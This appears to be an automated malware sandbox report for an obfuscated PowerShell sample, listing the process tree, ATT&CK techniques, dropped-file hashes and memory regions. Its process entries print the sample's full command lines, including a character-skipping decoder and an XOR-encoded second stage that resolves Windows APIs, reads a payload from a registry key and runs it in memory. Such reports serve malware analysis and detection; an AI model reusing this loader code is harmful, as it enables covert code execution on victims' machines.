Se'VaBRy9KbCSvALsFCa4VeFRa1LeFAd9JeFBo1EkERe4TiAfjECoBDeDBuAPl0UrBLeDElBCo9AdEPaBBeFdaCSaEJoFKaCIn2FoEBuBLiFHyCDrBKl3VaDVi4hyFEn3CaEVoBKaFUd2BgFUd6MoFVa8AwBKn5DrCKa6StDBi4OuFRe3AsESu9BoCClDIpECo9AfEKoFFaCEf0grADu7ViABu7SeCFl7ImFCo8InEBlFDrFBj2haBPh1StBEmDGeALoESpABeBLyADk4PlBco1LrBTeDAvAKoDScEKo5HyAAnESoASpDBiAPaDMoAFoDBaBLi1PrBfeDCuABuDDaEKo5ImACu9AfAHeDHoBPa4pu'Ad;SnBVriMasHutBeaennKndFosUnvTurVigteevanLv9Re Ba`$SiTSwrInacafSciUdkunmVoiPrnNuiPosAftTaeCerFoiSyuHcmOvsSp7Ma;Se`$FoTInrSlaRefPaiKokSjmcoiinnDeiAbsSotOyeAnrPeiMeuUnmFlste8Sk Mo=Ac InHBoTeuBEf Re'ApBpr9PaFCi2FhEAfFEnFNo4MiBBoDDaAGa0SkBBrDBrBUn9MiECaBUnFPrCDeEKaFSeCPr2MiEFrBAmFMyCDeBFi3SoDHy4ViFEl3IsEDrBReFBr2PrFGr6UnFKr8DiBNo5DoCSk6coDMe4JaFSe3HaEKr9BaCDiDTiEPr9ApEFeFNaCFr0piAHy7AiATh7TrCLe7AfFTa8SkEBoFStFSe2beBEn1EvBCrDInAFaDOvESm5keASpCSeAGrDDrAseDOsAAdDTrAFiDFeAChDbiBFa1SiBArDDoAWaDInEUd5KnAOnEAdAMoDLiAWaDSaALiDMoBCr1caBVaDGrATrDBiEIn5ReAja9flBSn4La'Te;UdBGriGlsDetSkaKinTedBisSkvSyrSpgOfeScnDi9Di Ac`$coTForOvaMifKoiMekbamReiRenRuiStsPatKoeQurVaiPiuSlmVrsPu8An;Ce`$GaMtoaTagBliAksSktPerRaaKatsaiClcstaSnlBtlDeyPr=Br(GeGMyePhtMi-ReITatJaeCamSkPIdrMaoEspSmeImrGytShyPl Os-KePSkaCytVehbe Un'NsHSpKshCBeUSk:Su\DoFInoChrRypStaUngFatBenLsiGagKrsSkabafStgIniOofMitAfeWorSasve\FrUColEioPreSasAftHjeba'Ai)Un.MiHAreSkptraUntGeeHyckntItoNomjoyBr;Bo`$SuTHurUlaBafdeiAgkLomAtisvnApiMesDiteneAerTaiAnuTimafsba9Sp Ex=Pr SuHSuTGrBJa Le'feBDe9DiCTo9MoEExFSoFAnCReFinBTeFOf4TiFOp6AmFGa0afFLu4BeFCo3viFEx4SoEToEAnESu9BrFFu8SeEEnFtrFGa4SlEfr8MoFIn0FoESwEUdBApDUdAWo0UdBAmDtaCBi6ViCSuERoETe4SiEAkEFrESi9UdFDh8biFBr0DeBBu3IsDMoEReFFo2WeFBe3maEUdBHeFVu8InEFuFEfETr9DeCKo0woANe7IdAOp7SiDZyBAhECrFExFCh2TjFos0ToDHeFUnFUnCAnEFaETaFSo8DuAIlBSeAdu9UnCUnEFeESy9MoEBlFSuFTr4nrFha3DrFPhADeBda5UnBUn9RaDdi0OpFStCpeFFiABeFCh4ReEGeEOpEDi9UnEKoFkoFlaCepEIn9TrFMa4SuFGiEFrFHiCDeFso1PrFUn1FoEDi4SaBAl4Rh'Fl;KaBTriNssFitByaStnBidOusPuvDerFogHeeHynNa9Br Pr`$CoTVarWaaRafTriSakAdmToiShnMaiomsMotSleNordeiTruUdmDesUd9De;Fr`$FoMSlaOvgTriGgssptFyrIlaTetDeiPhcInaMalMalMuyBe0Ve Mu=Un diHIlTThBRe St'EnCPh6UnCMaEBaEHe4StEKaEHiEGn9LrFLo8BeFMi0ApBDo3AnCGrFFlEFi8UnFSe3EaESp9ReFVe4UdFPy0TiFAa8AdBBr3LoDUn4JeFDv3CiEGo9UnFEx8RuEBrFRaFAn2duEAiDKaCPaESyFSy8BiEReFTrEReBKaFTa4RiFKlEMeFSt8paEBeESnBCo3SnDMi0SeFseCInEDaFEjEIdEKbFAt5BoFMoCElFtr1foCRe0RaASr7UdARo7FrDOsEUnFsk2MaEBvDHiEBa4FoBco5EcBOu9JoCFa9SkEOvFSnFHjCTaFReBspFRe4MlFKa6MiFEa0KrFPr4huFKa3RoFCl4ArEFuEScEDr9AfFMa8deEOoFNeFCo4KoESk8SpFTr0LaESwEAfBSm1BvBKaDPrAGeDAbBGe1PaBKrDObBcoDcaBRe9TaCOnAInFMa4PhFpa1UlFRe9FaFFr1CoEPh4VaAGuEFoBAf1NoBLoDTaATiEMrAFoBSeABe4BeBBe4Hj'Er;KnBvaiPesNgtFeaImnDidLysEkvHyrBogOueKonBy9Un fr`$PuMBraPrgOsiArsOvtGurElaSttShiFncmaaMilBolHaySy0bi;Sa`$mesBeiMazFoeIn=Ga`$abTtirMoaBifcuiNekUnmVkiVinSqiOpsgetKoeHyrniiHouCnmNosLa.StcDioDruTjnFatId-rm3Di6St9Af;Br`$AlMReasygBoiBusTotArrPrabetgriKncAlaPylSplDkyKa1Ou Sa=Se anHvaTHuBan Ha'KnCLa6SeCNoEShEOp4CoEFiEWeEDr9EnFDi8BrFOv0ClBBe3SuCUnFFiEPh8PrFIn3ObEEk9ReFNo4EtFAr0UnFAn8DiBSt3FoDHj4FoFDr3fjEPa9RiFEl8AdEDeFVoFPr2VmEBeDBeCTeEBiFMo8FrEReFSaEIsBSnFLa4OvFAnEFaFOv8MiEAnEUdBTm3UnDJe0KrFMeCStEUnFUtEBuEUdFTr5GaFApCPaFti1HoCFr0UrAIn7EsATe7BrDAfEAuFIn2kaELeDUnEWo4AfBLa5ReBDi9SeCBe9ChEBeFArFAmCMiFCaBHaFIn4CoFKl6VoFRa0MiFSk4UtFFr3DiFDe4GrESpEclEBi9SyFNe8inENeFnoFPo4UnEli8GrFSt0PiEMuECoBSt1DiBTaDelAUkEAmAMeBReASk4MiBAu1StBCoDPaBSe9faFSu2ToEWiFCeFPu4FlBTr1TeBAfDCaBGr9CiENeEObFBj4geEAf7PoFKo8KaBcl4Gr'Fr;caBUniCisTutTaaRenCudReskovDyrSogFeelynAn9De Pe`$BeMSiaRegPriDosTitLsrNeaCatBniFocBeaMilPslhyyka1Ho;Bi`$GeMReaTagCeiSpsNotRdrBfaRytPriRecinaDilShlEryBr2Di Ro=Be TuHTiTOcBAc Re'FoBsw9feEAuBRaFUnCPrEHoFFoCPo2PrEInFCaEar8UnFJa3MiFFr0ToFBi8BrBPrDOrATh0KoBImDLoCAn6DyCTwESvEsw4RaEGrEBrESk9MaFNe8FuFDi0SoBSl3frCEiFMaEpl8UdFAm3ArEGa9joFSt4kaFFo0WhFBr8PuBBr3DiDGe4DrFDe3CaEOp9soFSd8BrELoFTiFSk2OrEStDBeCFrEChFOv8CoESeFJeESiBLyFAc4laFToEElFUn8UnEOrEStBBr3TiDLo0HoFFrCgeEFoFmaEReESvFpi5TjFBaCliFKo1RoCMo0teATu7HyAEi7DaDdoAMeFHi8ViEBu9CiDTo9TnFOs8NoFAf1eaFEm8OuFEqACiFMoCLeEtr9TpFHe8ViDHuBDyFUn2FuELaFfoDUnBMaEco8PrFTr3NoFapEOpESu9UdFYe4SuFma2AfFPo3DrCFlDDoFFo2PrFSe4juFGa3CoECo9InFSo8GaEToFAaBAf5doBAg9apCVaARoFmo4ChFSm1EoFPo9GaFEs1LiEYt4IaAEkESuBCo1KaBPoDCeBBr5SuDGrAHoDMa9LuCMa9TaBUmDRhDBlDVeBSt5SaCPa6ShDNa4RiFAk3hyETj9FuCchDOfEKa9CuETeFAmCPi0CoBTr1OrCfr6SaDun4RoFSu3viEPo9SlCShDOvEPa9UnEMaFFlCin0BaBku4hiBMiDFuBPr5JuCbr6alCToBWhFBe2UnFTr4UkFNe9LaCAb0meBBo4AuBMa4diBAu4Fy'Vi;StBGtiSisFitDeaScnLsdSksTrvAcrBegKleSvnCh9do Ta`$EqMhyaOvgSkiTusRetHurFiaHytReiIscWaaTrlColPrySi2Sm;Un`$GuMKoaOfgUniApsCotTarReaTrtOuiRecStaBelvilFlySp3He Kr=do EqHHyTThBSt Ko'FeBPh9PaEStBTrFBiCPlEPrFFiCFi2TaEBaFKnECa8riFHo3SoFwr0SeFho8UnBFa3aqDPr4TrFKr3AnEflBFoFCo2CoFLe6TaFUd8ReBTh5RaBwa9GgFOr2ArEPrFAnFTo4udBEl1FoBTu9NiEReBXaFUfCUnETaFUnCNi2HyFSu3DeEPr9psBGy4Bl'by;TeBUniMdsLotOdaDinVedspsTevPerspgRaeCanCo9ab Ma`$ReMDiaBigBriOpsFotForElaomtMeiMicEkabelBrlpryMa3Sy#Po;""";;Function Magistratically9 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Samvirk = $Samvirk + $HS.Substring($i, 1); } $Samvirk;}$Straffesparkfelter0 = Magistratically9 'CoIScERaXHo ';$Straffesparkfelter2 = Magistratically9 'LessctKoaDrrGatGa-SujFloLabPr ';$Straffesparkfelter1= Magistratically9 $Kaktusplanter;;if([IntPtr]::size -eq 8){ & ($Straffesparkfelter2) { param($a) powershell $a } -RunAs32 -Argument $Straffesparkfelter1 | wait-job | Receive-Job;}else{ & ($Straffesparkfelter0) $Straffesparkfelter1;};;;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3380

\??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4616

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$HS); $Bytes = New-Object byte[] ($HS.Length / 2); For($i=0; $i -lt $HS.Length; $i+=2){ $Bytes[$i/2] = [convert]::ToByte($HS.Substring($i, 2), 16); $Bytes[$i/2] = ($Bytes[$i/2] -bxor 157); } [String][System.Text.Encoding]::ASCII.GetString($bytes);}$Normalisfbr0=HTB 'CEE4EEE9F8F0B3F9F1F1';$Normalisfbr1=HTB 'D0F4FEEFF2EEF2FBE9B3CAF4F3AEAFB3C8F3EEFCFBF8D3FCE9F4EBF8D0F8E9F5F2F9EE';$Normalisfbr2=HTB 'DAF8E9CDEFF2FEDCF9F9EFF8EEEE';$Normalisfbr3=HTB 'CEE4EEE9F8F0B3CFE8F3E9F4F0F8B3D4F3E9F8EFF2EDCEF8EFEBF4FEF8EEB3D5FCF3F9F1F8CFF8FB';$Normalisfbr4=HTB 'EEE9EFF4F3FA';$Normalisfbr5=HTB 'DAF8E9D0F2F9E8F1F8D5FCF3F9F1F8';$Normalisfbr6=HTB 'CFC9CEEDF8FEF4FCF1D3FCF0F8B1BDD5F4F9F8DFE4CEF4FAB1BDCDE8FFF1F4FE';$Normalisfbr7=HTB 'CFE8F3E9F4F0F8B1BDD0FCF3FCFAF8F9';$Normalisfbr8=HTB 'CFF8FBF1F8FEE9F8F9D9F8F1F8FAFCE9F8';$Normalisfbr9=HTB 'D4F3D0F8F0F2EFE4D0F2F9E8F1F8';$Bistandsvrgen0=HTB 'D0E4D9F8F1F8FAFCE9F8C9E4EDF8';$Bistandsvrgen1=HTB 'DEF1FCEEEEB1BDCDE8FFF1F4FEB1BDCEF8FCF1F8F9B1BDDCF3EEF4DEF1FCEEEEB1BDDCE8E9F2DEF1FCEEEE';$Bistandsvrgen2=HTB 'D4F3EBF2F6F8';$Bistandsvrgen3=HTB 'CDE8FFF1F4FEB1BDD5F4F9F8DFE4CEF4FAB1BDD3F8EACEF1F2E9B1BDCBF4EFE9E8FCF1';$Bistandsvrgen4=HTB 'CBF4EFE9E8FCF1DCF1F1F2FE';$Bistandsvrgen5=HTB 'F3E9F9F1F1';$Bistandsvrgen6=HTB 'D3E9CDEFF2E9F8FEE9CBF4EFE9E8FCF1D0F8F0F2EFE4';$Bistandsvrgen7=HTB 'D4D8C5';$Bistandsvrgen8=HTB 'C1';Set-Alias -name Bistandsvrgen9 -value $Bistandsvrgen7;function fkp {Param ($v_m, $v_p) ;$Trafikministeriums0 =HTB 'B9EBE8F3F0BDA0BDB5C6DCEDEDD9F2F0FCF4F3C0A7A7DEE8EFEFF8F3E9D9F2F0FCF4F3B3DAF8E9DCEEEEF8F0FFF1F4F8EEB5B4BDE1BDCAF5F8EFF8B0D2FFF7F8FEE9BDE6BDB9C2B3DAF1F2FFFCF1DCEEEEF8F0FFF1E4DEFCFEF5F8BDB0DCF3F9BDB9C2B3D1F2FEFCE9F4F2F3B3CEEDF1F4E9B5B9DFF4EEE9FCF3F9EEEBEFFAF8F3A5B4C6B0ACC0B3D8ECE8FCF1EEB5B9D3F2EFF0FCF1F4EEFBFFEFADB4BDE0B4B3DAF8E9C9E4EDF8B5B9D3F2EFF0FCF1F4EEFBFFEFACB4';Bistandsvrgen9 $Trafikministeriums0;$Trafikministeriums5 = HTB 'B9EBFCEFC2FAEDFCBDA0BDB9EBE8F3F0B3DAF8E9D0F8E9F5F2F9B5B9D3F2EFF0FCF1F4EEFBFFEFAFB1BDC6C9E4EDF8C6C0C0BDDDB5B9D3F2EFF0FCF1F4EEFBFFEFAEB1BDB9D3F2EFF0FCF1F4EEFBFFEFA9B4B4';Bistandsvrgen9 $Trafikministeriums5;$Trafikministeriums1 = HTB 'EFF8E9E8EFF3BDB9EBFCEFC2FAEDFCB3D4F3EBF2F6F8B5B9F3E8F1F1B1BDDDB5C6CEE4EEE9F8F0B3CFE8F3E9F4F0F8B3D4F3E9F8EFF2EDCEF8EFEBF4FEF8EEB3D5FCF3F9F1F8CFF8FBC0B5D3F8EAB0D2FFF7F8FEE9BDCEE4EEE9F8F0B3CFE8F3E9F4F0F8B3D4F3E9F8EFF2EDCEF8EFEBF4FEF8EEB3D5FCF3F9F1F8CFF8FBB5B5D3F8EAB0D2FFF7F8FEE9BDD4F3E9CDE9EFB4B1BDB5B9EBE8F3F0B3DAF8E9D0F8E9F5F2F9B5B9D3F2EFF0FCF1F4EEFBFFEFA8B4B4B3D4F3EBF2F6F8B5B9F3E8F1F1B1BDDDB5B9EBC2F0B4B4B4B4B1BDB9EBC2EDB4B4';Bistandsvrgen9 $Trafikministeriums1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $vrt = [Void]);$Trafikministeriums2 = HTB 'B9CBC9DFBDA0BDC6DCEDEDD9F2F0FCF4F3C0A7A7DEE8EFEFF8F3E9D9F2F0FCF4F3B3D9F8FBF4F3F8D9E4F3FCF0F4FEDCEEEEF8F0FFF1E4B5B5D3F8EAB0D2FFF7F8FEE9BDCEE4EEE9F8F0B3CFF8FBF1F8FEE9F4F2F3B3DCEEEEF8F0FFF1E4D3FCF0F8B5B9D3F2EFF0FCF1F4EEFBFFEFA5B4B4B1BDC6CEE4EEE9F8F0B3CFF8FBF1F8FEE9F4F2F3B3D8F0F4E9B3DCEEEEF8F0FFF1E4DFE8F4F1F9F8EFDCFEFEF8EEEEC0A7A7CFE8F3B4B3D9F8FBF4F3F8D9E4F3FCF0F4FED0F2F9E8F1F8B5B9D3F2EFF0FCF1F4EEFBFFEFA4B1BDB9FBFCF1EEF8B4B3D9F8FBF4F3F8C9E4EDF8B5B9DFF4EEE9FCF3F9EEEBEFFAF8F3ADB1BDB9DFF4EEE9FCF3F9EEEBEFFAF8F3ACB1BDC6CEE4EEE9F8F0B3D0E8F1E9F4FEFCEEE9D9F8F1F8FAFCE9F8C0B4';Bistandsvrgen9 $Trafikministeriums2;$Trafikministeriums3 = HTB 'B9CBC9DFB3D9F8FBF4F3F8DEF2F3EEE9EFE8FEE9F2EFB5B9D3F2EFF0FCF1F4EEFBFFEFABB1BDC6CEE4EEE9F8F0B3CFF8FBF1F8FEE9F4F2F3B3DEFCF1F1F4F3FADEF2F3EBF8F3E9F4F2F3EEC0A7A7CEE9FCF3F9FCEFF9B1BDB9EBFCEFC2EDFCEFFCF0F8E9F8EFEEB4B3CEF8E9D4F0EDF1F8F0F8F3E9FCE9F4F2F3DBF1FCFAEEB5B9D3F2EFF0FCF1F4EEFBFFEFAAB4';Bistandsvrgen9 $Trafikministeriums3;$Trafikministeriums4 = HTB 'B9CBC9DFB3D9F8FBF4F3F8D0F8E9F5F2F9B5B9DFF4EEE9FCF3F9EEEBEFFAF8F3AFB1BDB9DFF4EEE9FCF3F9EEEBEFFAF8F3AEB1BDB9EBEFE9B1BDB9EBFCEFC2EDFCEFFCF0F8E9F8EFEEB4B3CEF8E9D4F0EDF1F8F0F8F3E9FCE9F4F2F3DBF1FCFAEEB5B9D3F2EFF0FCF1F4EEFBFFEFAAB4';Bistandsvrgen9 $Trafikministeriums4;$Trafikministeriums5 = HTB 'EFF8E9E8EFF3BDB9CBC9DFB3DEEFF8FCE9F8C9E4EDF8B5B4';Bistandsvrgen9 $Trafikministeriums5 ;}$kk = HTB 'F6F8EFF3F8F1AEAF';$Trafikministeriums6 = HTB 'B9EBFCEFC2EBFCBDA0BDC6CEE4EEE9F8F0B3CFE8F3E9F4F0F8B3D4F3E9F8EFF2EDCEF8EFEBF4FEF8EEB3D0FCEFEEF5FCF1C0A7A7DAF8E9D9F8F1F8FAFCE9F8DBF2EFDBE8F3FEE9F4F2F3CDF2F4F3E9F8EFB5B5FBF6EDBDB9F6F6BDB9DFF4EEE9FCF3F9EEEBEFFAF8F3A9B4B1BDB5DAD9C9BDDDB5C6D4F3E9CDE9EFC0B1BDC6C8D4F3E9AEAFC0B1BDC6C8D4F3E9AEAFC0B1BDC6C8D4F3E9AEAFC0B4BDB5C6D4F3E9CDE9EFC0B4B4B4';Bistandsvrgen9 $Trafikministeriums6;$var_nt = fkp $Bistandsvrgen5 $Bistandsvrgen6;$Trafikministeriums7 = HTB 'B9CAF4F1F9F1E4AEBDA0BDB9EBFCEFC2EBFCB3D4F3EBF2F6F8B5C6D4F3E9CDE9EFC0A7A7C7F8EFF2B1BDAEABA4B1BDADE5AEADADADB1BDADE5A9ADB4';Bistandsvrgen9 $Trafikministeriums7;$Trafikministeriums8 = HTB 'B9F2EFF4BDA0BDB9EBFCEFC2EBFCB3D4F3EBF2F6F8B5C6D4F3E9CDE9EFC0A7A7C7F8EFF2B1BDADE5ACADADADADADB1BDADE5AEADADADB1BDADE5A9B4';Bistandsvrgen9 $Trafikministeriums8;$Magistratically=(Get-ItemProperty -Path 'HKCU:\Forpagtnigsafgifters\Uloeste').Hepatectomy;$Trafikministeriums9 = HTB 'B9C9EFFCFBF4F6F0F4F3F4EEE9F8EFF4E8F0EEBDA0BDC6CEE4EEE9F8F0B3DEF2F3EBF8EFE9C0A7A7DBEFF2F0DFFCEEF8ABA9CEE9EFF4F3FAB5B9D0FCFAF4EEE9EFFCE9F4FEFCF1F1E4B4';Bistandsvrgen9 $Trafikministeriums9;$Magistratically0 = HTB 'C6CEE4EEE9F8F0B3CFE8F3E9F4F0F8B3D4F3E9F8EFF2EDCEF8EFEBF4FEF8EEB3D0FCEFEEF5FCF1C0A7A7DEF2EDE4B5B9C9EFFCFBF4F6F0F4F3F4EEE9F8EFF4E8F0EEB1BDADB1BDBDB9CAF4F1F9F1E4AEB1BDAEABA4B4';Bistandsvrgen9 $Magistratically0;$size=$Trafikministeriums.count-369;$Magistratically1 = HTB 'C6CEE4EEE9F8F0B3CFE8F3E9F4F0F8B3D4F3E9F8EFF2EDCEF8EFEBF4FEF8EEB3D0FCEFEEF5FCF1C0A7A7DEF2EDE4B5B9C9EFFCFBF4F6F0F4F3F4EEE9F8EFF4E8F0EEB1BDAEABA4B1BDB9F2EFF4B1BDB9EEF4E7F8B4';Bistandsvrgen9 $Magistratically1;$Magistratically2 = HTB 'B9EBFCEFC2EFE8F3F0F8BDA0BDC6CEE4EEE9F8F0B3CFE8F3E9F4F0F8B3D4F3E9F8EFF2EDCEF8EFEBF4FEF8EEB3D0FCEFEEF5FCF1C0A7A7DAF8E9D9F8F1F8FAFCE9F8DBF2EFDBE8F3FEE9F4F2F3CDF2F4F3E9F8EFB5B9CAF4F1F9F1E4AEB1BDB5DAD9C9BDDDB5C6D4F3E9CDE9EFC0B1C6D4F3E9CDE9EFC0B4BDB5C6CBF2F4F9C0B4B4B4';Bistandsvrgen9 $Magistratically2;$Magistratically3 = HTB 'B9EBFCEFC2EFE8F3F0F8B3D4F3EBF2F6F8B5B9F2EFF4B1B9EBFCEFC2F3E9B4';Bistandsvrgen9 $Magistratically3#"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3808

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
93678e82d776686aa54c42b8a98e6cbc

SHA1
802939dfed99ac74814c4371388b204c5810241d

SHA256
da32a79a8e04cbafb1c5980b3d6225f4705010df5eb45d464cd5bf6b642d7841

SHA512
0b412a1e11c0639d72f6a58c661ecc43da021c010c4d1e66051c5a376ebab287480bbf663345c9bd2a79ec3a35a9788cf04d74d612449f76fe2c87576cd13520

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
f64b2090c4a32ddd590e2ab703aed412

SHA1
7030e05a1cceda4623606dc0e12e35e91f5e1a66

SHA256
98993f70964274de5c06b5b948aee0f27640d308af34109ab61b80c2d4c662f3

SHA512
8d97c79065f0d1aafdbb71d0d95571ae940a63f5acd055120fd28c5546da3fc819945eedbe6beeaaef5b732619a3d44b41a66caa3e0b5c66ce155a69ef1d5464

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
af7b7b4e4cb344f5d729084adc58dd5f

SHA1
9e2f80caffe516865e6bd707cb731b1be3f63271

SHA256
11f684d4cd5c0a03c408b1daa22e25a52547d183987b9af3e575029cfd32d61d

SHA512
6451d95310bc6ee8a641904e4c8aa59f3640789dba00e080c1178ec55a84b8fc331ad8d1e30ea011c3f0a440919300c4fd3262cfc5bba7c581992db2053001aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
abbc6c9ea424f486a1add58b718ded66

SHA1
c178e0a9c2607047e508623cb9a087a66675e747

SHA256
7865dd5178ff2892a98f2bdadff981801c5ba0beba14f21b44829c15e2a774e7

SHA512
fcc6cee915a90836a7c3ecf811bb0043dbb867e3c449ca90f23212e3ce9e1e71bc08b2a1f99b29dc9f1535838520210d13f4d07febebe76bbbb6af9001e906ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
abbc6c9ea424f486a1add58b718ded66

SHA1
c178e0a9c2607047e508623cb9a087a66675e747

SHA256
7865dd5178ff2892a98f2bdadff981801c5ba0beba14f21b44829c15e2a774e7

SHA512
fcc6cee915a90836a7c3ecf811bb0043dbb867e3c449ca90f23212e3ce9e1e71bc08b2a1f99b29dc9f1535838520210d13f4d07febebe76bbbb6af9001e906ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
f7b9cbcbc96f9b4428730c702c9d6ac9

SHA1
0ec0ea64212ab9ba89b52f55be44543264299eb8

SHA256
f94eaacefcb140d6c78f2e69c6e9160adb8fd01cd3ee486a005c09af241d1683

SHA512
aa58feccd2fd77831878384ba61da5aaf37bb15352f7c40629452b0bbd6139ef8a1319c2ab6df95909f7293beb88c7216a10a367826ab6f0eae069d44147c075

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
abbc6c9ea424f486a1add58b718ded66

SHA1
c178e0a9c2607047e508623cb9a087a66675e747

SHA256
7865dd5178ff2892a98f2bdadff981801c5ba0beba14f21b44829c15e2a774e7

SHA512
fcc6cee915a90836a7c3ecf811bb0043dbb867e3c449ca90f23212e3ce9e1e71bc08b2a1f99b29dc9f1535838520210d13f4d07febebe76bbbb6af9001e906ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
37ac078607e983deac3ba94b493953f8

SHA1
c6d7f70aad3a5046cffa6f62bc5fb50f5050e0d0

SHA256
fb410a5f763d71967c80524aa4f858c36eb27f615a3f72434798aa5a92ede0c5

SHA512
1031b53c6ee03c9c6cefdcb4ad3c05f373d617cb6db9ab97b798b52918f16edfae6d84e5936e8fec2c4dc3c8b78ae59cc3439b4f7528fd8bb25bc00d866cd45d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
0b5af8369d89f7d9d59806af33b594ab

SHA1
b3dd266176bed082388a657af1c67bbbe1fe5c94

SHA256
eacb9730bc8e9d19efa914c371370c464b173112fb22c14795403feda652dc4a

SHA512
4f8433d1072be06e45ff796eec84333e31eb9a2b31aa64c20e143d8cc89932958c9045376e19dd2475e4d6bf7daa62077d887e9474a0935d2804ade438ebafc5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
37ac078607e983deac3ba94b493953f8

SHA1
c6d7f70aad3a5046cffa6f62bc5fb50f5050e0d0

SHA256
fb410a5f763d71967c80524aa4f858c36eb27f615a3f72434798aa5a92ede0c5

SHA512
1031b53c6ee03c9c6cefdcb4ad3c05f373d617cb6db9ab97b798b52918f16edfae6d84e5936e8fec2c4dc3c8b78ae59cc3439b4f7528fd8bb25bc00d866cd45d

Download Submit
memory/3380-140-0x00007FFCC90B0000-0x00007FFCC9B71000-memory.dmp

Filesize
10.8MB

Download
memory/3380-134-0x0000021B6D290000-0x0000021B6D406000-memory.dmp

Filesize
1.5MB

Download
memory/3380-135-0x00007FFCC90B0000-0x00007FFCC9B71000-memory.dmp

Filesize
10.8MB

Download
memory/3380-132-0x0000000000000000-mapping.dmp

Download
memory/3380-133-0x0000021B6B600000-0x0000021B6B622000-memory.dmp

Filesize
136KB

Download
memory/3380-136-0x0000021B6D620000-0x0000021B6D82A000-memory.dmp

Filesize
2.0MB

Download
memory/3808-155-0x0000000007A50000-0x0000000007B50000-memory.dmp

Filesize
1024KB

Download
memory/3808-149-0x0000000007C20000-0x0000000007CB6000-memory.dmp

Filesize
600KB

Download
memory/3808-150-0x0000000007BB0000-0x0000000007BD2000-memory.dmp

Filesize
136KB

Download
memory/3808-151-0x0000000008E30000-0x00000000093D4000-memory.dmp

Filesize
5.6MB

Download
memory/3808-152-0x0000000007A50000-0x0000000007B50000-memory.dmp

Filesize
1024KB

Download
memory/3808-145-0x0000000000000000-mapping.dmp

Download
memory/4616-143-0x00000000056A0000-0x0000000005706000-memory.dmp

Filesize
408KB

Download
memory/4616-144-0x0000000005EB0000-0x0000000005ECE000-memory.dmp

Filesize
120KB

Download
memory/4616-142-0x00000000055C0000-0x0000000005626000-memory.dmp

Filesize
408KB

Download
memory/4616-141-0x0000000005520000-0x0000000005542000-memory.dmp

Filesize
136KB

Download
memory/4616-139-0x0000000004EA0000-0x00000000054C8000-memory.dmp

Filesize
6.2MB

Download
memory/4616-138-0x0000000002780000-0x00000000027B6000-memory.dmp

Filesize
216KB

Download
memory/4616-137-0x0000000000000000-mapping.dmp

Download
memory/4616-148-0x00000000063D0000-0x00000000063EA000-memory.dmp

Filesize
104KB

Download
memory/4616-147-0x0000000006C80000-0x00000000072FA000-memory.dmp

Filesize
6.5MB

Download